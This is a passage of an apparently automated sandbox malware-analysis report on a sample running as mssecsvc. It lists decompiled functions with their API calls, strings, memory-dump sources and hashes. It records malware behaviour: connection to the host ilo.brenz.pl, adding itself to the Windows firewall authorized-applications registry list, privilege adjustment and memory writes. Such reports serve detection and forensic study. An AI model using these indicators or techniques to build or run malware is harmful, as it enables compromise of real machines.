                    APIs
                    • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                    • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID:
                    • API String ID: 3615134276-0
                    • Opcode ID: 93769c60b222f1b750d747f357397c67afbd40ef6ee3f9ba66e61aa9824ec2a4
                    • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                    • Opcode Fuzzy Hash: 93769c60b222f1b750d747f357397c67afbd40ef6ee3f9ba66e61aa9824ec2a4
                    • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA2477 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 7FEA249B
                    • NtWriteVirtualMemory.NTDLL ref: 7FEA24A4
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: MemoryVirtual$ProtectWrite
                    • String ID:
                    • API String ID: 151266762-0
                    • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                    • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                    • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                    • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA144A Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                    • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID:
                    • API String ID: 3615134276-0
                    • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                    • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                    • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                    • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA28C8 Relevance: .1, Instructions: 107COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                    • Instruction ID: 599e4210a27b95691828082bf071d632d483ec5813d8a2b375e76b2b2bcd3a21
                    • Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                    • Instruction Fuzzy Hash: 6A31F5326006158BEB148E38C94079AB7F2FB84704F10C63CE557FB594D676F6898BC0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B028C8 Relevance: .1, Instructions: 107COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                    • Instruction ID: 71db59ddb0c02d7c0b1c8ebc760af44018ad34d8210eb367ab0f6b7100c8c3ae
                    • Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                    • Instruction Fuzzy Hash: 9A3105326006158BEB148F38C84979AB7E2FB94304F10C67DE556E75C0E675EA8D8BC0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA025E Relevance: .0, Instructions: 44COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0cf41f52040ca5e6b6927679fca8f8038c7771ed2d7cc969bb87da6b112f4972
                    • Instruction ID: e9407abda7b01ee099ae5da6d0bc1793b46753bc5066851cd70037eb2d558cfc
                    • Opcode Fuzzy Hash: 0cf41f52040ca5e6b6927679fca8f8038c7771ed2d7cc969bb87da6b112f4972
                    • Instruction Fuzzy Hash: 850128326413455AD721DF38CC88FEDBBA1FBC4334F108365E6544F189D672A2858661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B0025E Relevance: .0, Instructions: 44COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0cf41f52040ca5e6b6927679fca8f8038c7771ed2d7cc969bb87da6b112f4972
                    • Instruction ID: eb1c831ea65f21a70035da57a9546c4f09495bad17fe78a4ed02a6ea921822dc
                    • Opcode Fuzzy Hash: 0cf41f52040ca5e6b6927679fca8f8038c7771ed2d7cc969bb87da6b112f4972
                    • Instruction Fuzzy Hash: 240164322101456BC720FF28CC89F9EBBE2FBC4334F1083A4F4945B1CACA71E2818A91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA3F8F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 224networkthreadlibraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(7FEA3F83), ref: 7FEA3F8F
                    • WSAStartup.WS2_32(00000101), ref: 7FEA3FCE
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                    • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                    • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                    • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                    • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                    • wsprintfA.USER32 ref: 7FEA4179
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                    • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                    • GetTickCount.KERNEL32 ref: 7FEA41F6
                    • RtlExitUserThread.NTDLL(00000000), ref: 7FEA4322
                    Strings
                    • ilo.brenz.pl, xrefs: 7FEA4056, 7FEA4065
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
                    • String ID: C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$\DEVICE\AFD\ENDPOINT$ilo.brenz.pl
                    • API String ID: 3316401344-3637711440
                    • Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                    • Instruction ID: 1da76589fb4dd87b5df105d6ae65f4369b8eb418b0376c81cadce6663e0d34e8
                    • Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                    • Instruction Fuzzy Hash: 1391EC71508348BEEB229F348859BEE7FAEEF41304F000648E85A9E191C3F66F45DB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B03F8F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 224networkthreadlibraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(00B03F83), ref: 00B03F8F
                    • WSAStartup.WS2_32(00000101), ref: 00B03FCE
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B03FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 00B03FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B03FFF
                    • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00B04057
                    • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00B04066
                    • socket.WS2_32(00000002,00000001,00000000), ref: 00B04097
                    • connect.WS2_32(6F6C6902,00B03B09,00000010), ref: 00B040B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B040FB
                    • wsprintfA.USER32 ref: 00B04179
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00B041B4
                    • CloseHandle.KERNEL32(?,00000000,6F6C6902,00B06AA2,00000000,00000000), ref: 00B041BD
                    • GetTickCount.KERNEL32 ref: 00B041F6
                    • RtlExitUserThread.NTDLL(00000000), ref: 00B04322
                    Strings
                    • ilo.brenz.pl, xrefs: 00B04056, 00B04065
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
                    • String ID: C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$\DEVICE\AFD\ENDPOINT$ilo.brenz.pl
                    • API String ID: 3316401344-3637711440
                    • Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                    • Instruction ID: be9f3f2cb5a4584904dfda9f87cbf596763b954dc007f93c079e890ba15af356
                    • Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                    • Instruction Fuzzy Hash: DA91C9B1618248BAEB319F24881DBEA7FEDEF41300F040588EA5A9E1D1D3F45F45CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA3EB5 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 276networklibrarythreadCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(7FEA3EA9), ref: 7FEA3EB5
                      • Part of subcall function 7FEA3ECC: GetProcAddress.KERNEL32(00000000,7FEA3EC0), ref: 7FEA3ECD
                      • Part of subcall function 7FEA3ECC: GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 7FEA3EE2
                      • Part of subcall function 7FEA3ECC: wsprintfA.USER32 ref: 7FEA3EF7
                      • Part of subcall function 7FEA3ECC: CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                      • Part of subcall function 7FEA3ECC: CloseHandle.KERNEL32(?,9C1F5710), ref: 7FEA3F49
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                    • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                    • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                    • wsprintfA.USER32 ref: 7FEA4179
                    Strings
                    • C:,, xrefs: 7FEA3EF6, 7FEA3F08
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA3EDF, 7FEA3EF4, 7FEA3F0B, 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FEA3F0C
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
                    • String ID: C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 4150863296-3060447344
                    • Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                    • Instruction ID: a15a6457230e598bb6ef6cbbffa0e8635eaa4eb844119d8f0639b47af27d7a61
                    • Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                    • Instruction Fuzzy Hash: A3A1FF71419348BFEB219F348C49BFA7BACEF41304F004659E84A9E092D6F66F05C7A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B03EB5 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 276networklibrarythreadCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(00B03EA9), ref: 00B03EB5
                      • Part of subcall function 00B03ECC: GetProcAddress.KERNEL32(00000000,00B03EC0), ref: 00B03ECD
                      • Part of subcall function 00B03ECC: GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 00B03EE2
                      • Part of subcall function 00B03ECC: wsprintfA.USER32 ref: 00B03EF7
                      • Part of subcall function 00B03ECC: CreateThread.KERNEL32(00000000,00000000,00B03691,00000000,00000000), ref: 00B03F40
                      • Part of subcall function 00B03ECC: CloseHandle.KERNEL32(?,9C1F5710), ref: 00B03F49
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B03FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 00B03FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B03FFF
                    • socket.WS2_32(00000002,00000001,00000000), ref: 00B04097
                    • connect.WS2_32(6F6C6902,00B03B09,00000010), ref: 00B040B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B040FB
                    • wsprintfA.USER32 ref: 00B04179
                    Strings
                    • C:,, xrefs: 00B03EF6, 00B03F08
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00B03F0C
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B03EDF, 00B03EF4, 00B03F0B, 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
                    • String ID: C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 4150863296-3060447344
                    • Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                    • Instruction ID: 0325e283dbc4250fe88c927055e5f8001fb9b26d3385d8c67d8f2a98feeb1885
                    • Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                    • Instruction Fuzzy Hash: D0A1DCB1518249BEEB219F248C5EBEA7FECEF42300F044689E9499E0C2D7F05F4587A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA3ECC Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 265threadlibraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcAddress.KERNEL32(00000000,7FEA3EC0), ref: 7FEA3ECD
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 7FEA3EE2
                    • wsprintfA.USER32 ref: 7FEA3EF7
                    • CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                    • CloseHandle.KERNEL32(?,9C1F5710), ref: 7FEA3F49
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                      • Part of subcall function 7FEA3405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                      • Part of subcall function 7FEA3405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                      • Part of subcall function 7FEA3405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                      • Part of subcall function 7FEA3405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                      • Part of subcall function 7FEA3405: UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                    Strings
                    • C:,, xrefs: 7FEA3EF6, 7FEA3F08
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA3EDF, 7FEA3EF4, 7FEA3F0B, 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FEA3F0C
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
                    • String ID: C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 541178049-3060447344
                    • Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                    • Instruction ID: d9e398f0cb57442fd0ba00def27d3fe33590f3ea382637dc010686527708efc5
                    • Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                    • Instruction Fuzzy Hash: 65A10071408348BFEB219F348C49BEA7BACEF81304F004659E84A9E091D7F66F05C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B03ECC Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 265threadlibraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcAddress.KERNEL32(00000000,00B03EC0), ref: 00B03ECD
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 00B03EE2
                    • wsprintfA.USER32 ref: 00B03EF7
                    • CreateThread.KERNEL32(00000000,00000000,00B03691,00000000,00000000), ref: 00B03F40
                    • CloseHandle.KERNEL32(?,9C1F5710), ref: 00B03F49
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B03FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 00B03FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B03FFF
                      • Part of subcall function 00B03405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00B0344A
                      • Part of subcall function 00B03405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00B03469
                      • Part of subcall function 00B03405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00B03493
                      • Part of subcall function 00B03405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00B034A0
                      • Part of subcall function 00B03405: UnmapViewOfFile.KERNEL32(?), ref: 00B034B8
                    Strings
                    • C:,, xrefs: 00B03EF6, 00B03F08
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00B03F0C
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B03EDF, 00B03EF4, 00B03F0B, 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
                    • String ID: C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 541178049-3060447344
                    • Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                    • Instruction ID: 22e347590fa49a5ba3addc16570a76a3e925003c3a1d5432651f21464d246bd4
                    • Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                    • Instruction Fuzzy Hash: 75A1ECB1518259BEEB219F248C4EBEA7FECEF41300F044689E9499E0C2D7F05F4587A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA3F60 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 215librarystringthreadCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(7FEA3F54), ref: 7FEA3F60
                      • Part of subcall function 7FEA3F8F: LoadLibraryA.KERNEL32(7FEA3F83), ref: 7FEA3F8F
                      • Part of subcall function 7FEA3F8F: WSAStartup.WS2_32(00000101), ref: 7FEA3FCE
                      • Part of subcall function 7FEA3F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                      • Part of subcall function 7FEA3F8F: CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                      • Part of subcall function 7FEA3F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                      • Part of subcall function 7FEA3F8F: socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                      • Part of subcall function 7FEA3F8F: connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                      • Part of subcall function 7FEA3F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                    • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                    • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                    • wsprintfA.USER32 ref: 7FEA4179
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                    • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                    • GetTickCount.KERNEL32 ref: 7FEA41F6
                    Strings
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
